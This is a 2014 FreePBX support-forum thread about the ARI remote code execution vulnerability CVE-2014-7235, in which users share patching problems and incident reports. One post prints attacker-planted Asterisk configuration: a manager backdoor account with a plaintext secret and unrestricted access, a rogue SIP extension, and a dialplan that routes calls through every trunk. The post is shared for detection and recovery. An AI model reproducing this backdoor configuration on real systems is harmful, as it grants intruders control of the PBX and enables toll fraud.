Critical FreePBX RCE Vulnerability (ALL Versions) CVE-2014-7235

jfinstrom · October 1, 2014, 3:52pm

jfinstrom · October 1, 2014, 3:52pm

td1984r · October 3, 2014, 10:24am

Hello,

Can you please help out regarding this critical update of ARI
Framework on Elastix system. I cannot update Freepbx to version 2.9
since Elastix latest stable release 2.4.0 uses Freepbx 2.8

I already tried upgrade and force it, but it brakes Elastix and web interface without possibility of recovery.

Is there a way to patch ARI framework on freePBX 2.8 without upgrading to ver 2.9?

Thank you very much.

Slaven.

tonyclewis · October 3, 2014, 1:57pm

You would need to talk with Elastix since they are using a old and unsupported version of FreePBX that has not been supported in a long time.

jfinstrom · October 3, 2014, 2:41pm

Elastix has a bug up you may wish to participate in http://bugs.elastix.org/view.php?id=2003

jfinstrom · October 5, 2014, 8:45pm

Please be aware that the files mentioned in this post are the only known exploit in the wild. When a notice like this goes live the code monkeys review the patch and go to work building their own ways to exploit the vulnerability. Dont assume because these files aren’t present that you are safe. If you haven’t updated you are still exposed. If you find other exploit signatures please let us know.

borispr · October 6, 2014, 2:14pm

I also have been hacked by this vulnerability. And the interesting thing - I did never trust freepbx web interface and did not want to have it available from the internet BUT…
but I could not block 80 port completely because I need to have other sites available.
So in the /etc/httpd/conf.d/freepbx.conf I have changed “Allow from All” to “Allow from 127.0.0.1 192.168.0”. Everything was fine until one update replaced it with “clean” freepbx.conf with 'allow all".
You are doing security settings but update just removes them. Very nice!

jfinstrom · October 6, 2014, 2:24pm

This vulnerability has nothing to do with the FreePBX webui it is within a 3dr party component we include called the Asterisk Recording Interface Framework. With 12 we have deprecated use of this component in favor of our own solution the UCP. Generally you would never make changes to any packaged config because updating of it’s parent package will nuke your changes. Also Apache is not the correct place to be blocking/allowing IP addresses. If they have gotten to apache they are already in even if apache says no. Access control should be done ideally at the edge of your network If your PBX is at the edge of your network for some odd reason then use IPTables to control IP based access.

borispr · October 8, 2014, 7:37am

Apache is good enough to restrict access for virtual sites. It was not problem with Apache, it was problem with update that replaced security file. It’s like iptables update cleans all iptables rules. If conf file is changed normal behavior to keep it and rename new file to “rpmnew”.

bksales · October 9, 2014, 7:31pm

I see that the distro on the downloads page is still 5.211.65-16, maybe that should be -19?

tonyclewis · October 9, 2014, 8:25pm

It already has been updated. Looks like someone forgot to update the text. Will do that now but it does install -19

slawka · October 10, 2014, 9:15am

How do I know that the issue is resolved?
FreePBX 2.11

harrytran · October 12, 2014, 1:40pm

I updated Freepbx distro but attacker created freepbx admin user, and I can not delete it. Pleae help me with this

attacker admin user: mgknight

Chimnysweep · October 12, 2014, 4:53pm

Same issue as harrytran. I’ve got a user mgknight that I cannot delete. Any help appreciated.

Thanks!
Westley

tonyclewis · October 12, 2014, 5:02pm

Were your systems updated before these users were created.

Chimnysweep · October 12, 2014, 5:18pm

No for me. I tried deleting both before and after updating.

Westley

tm1000 · October 12, 2014, 5:42pm

What happens when you try to delete it?

Chimnysweep · October 12, 2014, 11:45pm

It goes thru the process like it is trying to delete, but never actually does.

No error or warning messages.

tm1000 · October 13, 2014, 12:16am

What version of FreePBX?

CharlotteInternet · October 13, 2014, 12:40am

I found these files modified:
You’ll find the Admin user modified, a new users called mgknight and a new ext 1986.

Manager_custom.conf
Sip_customer.conf
Extensions_customer.conf

manager_customer.conf
[mgknight]
secret=mgklives
permit=0.0.0.0/0.0.0.0
read = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate
write = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate
writetimeout = 5000

sip_customer.conf
[1986]
host=dynamic
context=from-internal
secret=qhIoiHzZes
type=friend

Extensions_custom.conf
[from-internal-noxfer-custom]
exten => _1986.,1,Macro(user-callerid,LIMIT,EXTERNAL,)
exten => _1986.,n,ExecIf($[ “${CALLEE_ACCOUNCODE}” != “” ] ?Set(CDR(accountcode)=${CALLEE_ACCOUNCODE}))
exten => _1986.,n,Set(MOHCLASS=${IF($["${MOHCLASS}"=""]?default:${MOHCLASS})})
exten => _1986.,n,Set(_NODEST=)
exten => _1986.,n,Gosub(sub-record-check,s,1(out,${EXTEN},))
exten => _1986.,n,Macro(dialout-trunk,1,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,2,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,3,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,4,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,5,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,6,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,7,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,8,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,9,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,10,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,11,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,12,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,13,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,14,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,15,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,16,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,17,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,18,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,19,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,20,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,21,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,22,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,23,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,24,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,25,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,26,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,27,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,28,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,28,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,29,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,30,${EXTEN:4},off)
exten => _1986.,n,Macro(outisbusy,)
[mgkext]
exten => _X.,1,NoOp(“Click in Context”)
exten => _X.,n,Answer(999999999999999999)
exten => _X.,n,Wait(999999999999999999)

Even though my username was missing in the Administrator page, I was still able to access the system via SSH and web-browser.

I preformed a back up and only restore /var & /etc.

After the backup was complete the mgknight and ext 1986 were gone.
I then preformed updates via the Module page.
My system has been stable since.

I forgot to add to my comments - that I created a new FreePBX install
and then restored my backup from before the exploit hit my system.
Sorry for any confusion.

Good Luck!!